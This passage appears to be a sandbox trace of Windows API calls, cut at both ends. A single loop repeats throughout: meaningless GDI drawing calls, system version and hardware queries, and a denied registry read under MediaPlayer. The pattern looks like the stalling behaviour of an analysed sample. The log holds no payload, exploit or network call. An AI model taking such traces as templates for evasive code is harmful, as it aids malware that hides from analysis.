(hdc=0x0, color=0x0) returned 0xffffffff [0088.311] BeginPath (hdc=0x0) returned 0 [0088.311] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.311] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.311] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.311] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.311] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.311] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.311] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.311] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.312] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6b0401d6 [0088.312] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6d0401d3 [0088.312] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414ca [0088.312] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414cb [0088.312] CombineRgn (hrgnDst=0x10414ca, hrgnSrc1=0x6b0401d6, hrgnSrc2=0x6d0401d3, iMode=1) returned 1 [0088.312] CombineRgn (hrgnDst=0x10414cb, hrgnSrc1=0x6b0401d6, hrgnSrc2=0x6d0401d3, iMode=4) returned 2 [0088.312] CreateSolidBrush (color=0xff) returned 0x21014c9 [0088.312] CreateSolidBrush (color=0xff0000) returned 0x11014cc [0088.312] DeleteObject (ho=0x11014cc) returned 1 [0088.312] DeleteObject (ho=0x6d0401d3) returned 1 [0088.312] DeleteObject (ho=0x6b0401d6) returned 1 [0088.312] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.312] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.312] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.312] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.312] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.312] BeginPath (hdc=0x0) returned 0 [0088.312] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.312] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.312] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.312] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.312] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.312] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.312] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.312] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.312] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6e0401d3 [0088.312] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6c0401d6 [0088.312] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414cd [0088.312] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414ce [0088.312] CombineRgn (hrgnDst=0x10414cd, hrgnSrc1=0x6e0401d3, hrgnSrc2=0x6c0401d6, iMode=1) returned 1 [0088.312] CombineRgn (hrgnDst=0x10414ce, hrgnSrc1=0x6e0401d3, hrgnSrc2=0x6c0401d6, iMode=4) returned 2 [0088.312] CreateSolidBrush (color=0xff) returned 0x21014cc [0088.312] CreateSolidBrush (color=0xff0000) returned 0x11014cf [0088.313] DeleteObject (ho=0x11014cf) returned 1 [0088.313] DeleteObject (ho=0x6c0401d6) returned 1 [0088.313] DeleteObject (ho=0x6e0401d3) returned 1 [0088.313] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.313] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.313] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.313] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.313] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.313] BeginPath (hdc=0x0) returned 0 [0088.313] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.313] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.313] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.313] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.313] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.313] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.313] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.313] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.313] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6d0401d6 [0088.313] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6f0401d3 [0088.313] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414d0 [0088.313] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414d1 [0088.313] CombineRgn (hrgnDst=0x10414d0, hrgnSrc1=0x6d0401d6, hrgnSrc2=0x6f0401d3, iMode=1) returned 1 [0088.313] CombineRgn (hrgnDst=0x10414d1, hrgnSrc1=0x6d0401d6, hrgnSrc2=0x6f0401d3, iMode=4) returned 2 [0088.313] CreateSolidBrush (color=0xff) returned 0x21014cf [0088.313] CreateSolidBrush (color=0xff0000) returned 0x11014d2 [0088.313] DeleteObject (ho=0x11014d2) returned 1 [0088.313] DeleteObject (ho=0x6f0401d3) returned 1 [0088.313] DeleteObject (ho=0x6d0401d6) returned 1 [0088.313] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.313] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.314] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.314] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.314] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.314] BeginPath (hdc=0x0) returned 0 [0088.314] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.314] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.314] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.314] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.314] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.314] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.314] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.314] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.314] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x700401d3 [0088.314] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6e0401d6 [0088.314] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414d3 [0088.314] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414d4 [0088.314] CombineRgn (hrgnDst=0x10414d3, hrgnSrc1=0x700401d3, hrgnSrc2=0x6e0401d6, iMode=1) returned 1 [0088.314] CombineRgn (hrgnDst=0x10414d4, hrgnSrc1=0x700401d3, hrgnSrc2=0x6e0401d6, iMode=4) returned 2 [0088.314] CreateSolidBrush (color=0xff) returned 0x21014d2 [0088.314] CreateSolidBrush (color=0xff0000) returned 0x11014d5 [0088.314] DeleteObject (ho=0x11014d5) returned 1 [0088.314] DeleteObject (ho=0x6e0401d6) returned 1 [0088.314] DeleteObject (ho=0x700401d3) returned 1 [0088.314] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.314] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.314] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.314] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.314] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.314] BeginPath (hdc=0x0) returned 0 [0088.314] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.314] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.314] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.315] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.315] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.315] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.315] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.315] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.315] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6f0401d6 [0088.315] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x710401d3 [0088.315] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414d6 [0088.315] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414d7 [0088.315] CombineRgn (hrgnDst=0x10414d6, hrgnSrc1=0x6f0401d6, hrgnSrc2=0x710401d3, iMode=1) returned 1 [0088.315] CombineRgn (hrgnDst=0x10414d7, hrgnSrc1=0x6f0401d6, hrgnSrc2=0x710401d3, iMode=4) returned 2 [0088.315] CreateSolidBrush (color=0xff) returned 0x21014d5 [0088.315] CreateSolidBrush (color=0xff0000) returned 0x11014d8 [0088.315] DeleteObject (ho=0x11014d8) returned 1 [0088.315] DeleteObject (ho=0x710401d3) returned 1 [0088.315] DeleteObject (ho=0x6f0401d6) returned 1 [0088.315] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.315] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.315] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.315] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.315] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.315] BeginPath (hdc=0x0) returned 0 [0088.315] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.315] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.315] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.315] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.315] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.315] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.315] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.315] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.316] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x720401d3 [0088.316] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x700401d6 [0088.316] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414d9 [0088.316] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414da [0088.316] CombineRgn (hrgnDst=0x10414d9, hrgnSrc1=0x720401d3, hrgnSrc2=0x700401d6, iMode=1) returned 1 [0088.316] CombineRgn (hrgnDst=0x10414da, hrgnSrc1=0x720401d3, hrgnSrc2=0x700401d6, iMode=4) returned 2 [0088.316] CreateSolidBrush (color=0xff) returned 0x21014d8 [0088.316] CreateSolidBrush (color=0xff0000) returned 0x11014db [0088.316] DeleteObject (ho=0x11014db) returned 1 [0088.316] DeleteObject (ho=0x700401d6) returned 1 [0088.316] DeleteObject (ho=0x720401d3) returned 1 [0088.316] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.316] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.316] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.316] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.316] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.316] BeginPath (hdc=0x0) returned 0 [0088.316] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.316] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.316] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.316] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.316] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.316] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.316] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.316] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.316] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x710401d6 [0088.316] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x730401d3 [0088.316] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414dc [0088.317] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414dd [0088.317] CombineRgn (hrgnDst=0x10414dc, hrgnSrc1=0x710401d6, hrgnSrc2=0x730401d3, iMode=1) returned 1 [0088.317] CombineRgn (hrgnDst=0x10414dd, hrgnSrc1=0x710401d6, hrgnSrc2=0x730401d3, iMode=4) returned 2 [0088.317] CreateSolidBrush (color=0xff) returned 0x21014db [0088.317] CreateSolidBrush (color=0xff0000) returned 0x11014de [0088.317] DeleteObject (ho=0x11014de) returned 1 [0088.317] DeleteObject (ho=0x730401d3) returned 1 [0088.317] DeleteObject (ho=0x710401d6) returned 1 [0088.317] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.317] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.317] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.317] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.317] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.317] BeginPath (hdc=0x0) returned 0 [0088.317] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.317] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.317] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.317] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.317] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.317] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.317] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.317] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.317] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x740401d3 [0088.317] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x720401d6 [0088.317] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414df [0088.317] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414e0 [0088.317] CombineRgn (hrgnDst=0x10414df, hrgnSrc1=0x740401d3, hrgnSrc2=0x720401d6, iMode=1) returned 1 [0088.317] CombineRgn (hrgnDst=0x10414e0, hrgnSrc1=0x740401d3, hrgnSrc2=0x720401d6, iMode=4) returned 2 [0088.317] CreateSolidBrush (color=0xff) returned 0x21014de [0088.317] CreateSolidBrush (color=0xff0000) returned 0x11014e1 [0088.317] DeleteObject (ho=0x11014e1) returned 1 [0088.317] DeleteObject (ho=0x720401d6) returned 1 [0088.317] DeleteObject (ho=0x740401d3) returned 1 [0088.318] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.318] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.318] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.318] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.318] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.318] BeginPath (hdc=0x0) returned 0 [0088.318] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.318] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.318] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.318] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.318] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.318] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.318] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.318] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.318] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x730401d6 [0088.318] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x750401d3 [0088.318] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414e2 [0088.318] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414e3 [0088.318] CombineRgn (hrgnDst=0x10414e2, hrgnSrc1=0x730401d6, hrgnSrc2=0x750401d3, iMode=1) returned 1 [0088.318] CombineRgn (hrgnDst=0x10414e3, hrgnSrc1=0x730401d6, hrgnSrc2=0x750401d3, iMode=4) returned 2 [0088.318] CreateSolidBrush (color=0xff) returned 0x21014e1 [0088.318] CreateSolidBrush (color=0xff0000) returned 0x11014e4 [0088.318] DeleteObject (ho=0x11014e4) returned 1 [0088.318] DeleteObject (ho=0x750401d3) returned 1 [0088.318] DeleteObject (ho=0x730401d6) returned 1 [0088.318] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.318] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.318] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.318] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.319] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.319] BeginPath (hdc=0x0) returned 0 [0088.319] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.319] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.319] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.319] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.319] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.319] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.319] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.319] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.319] 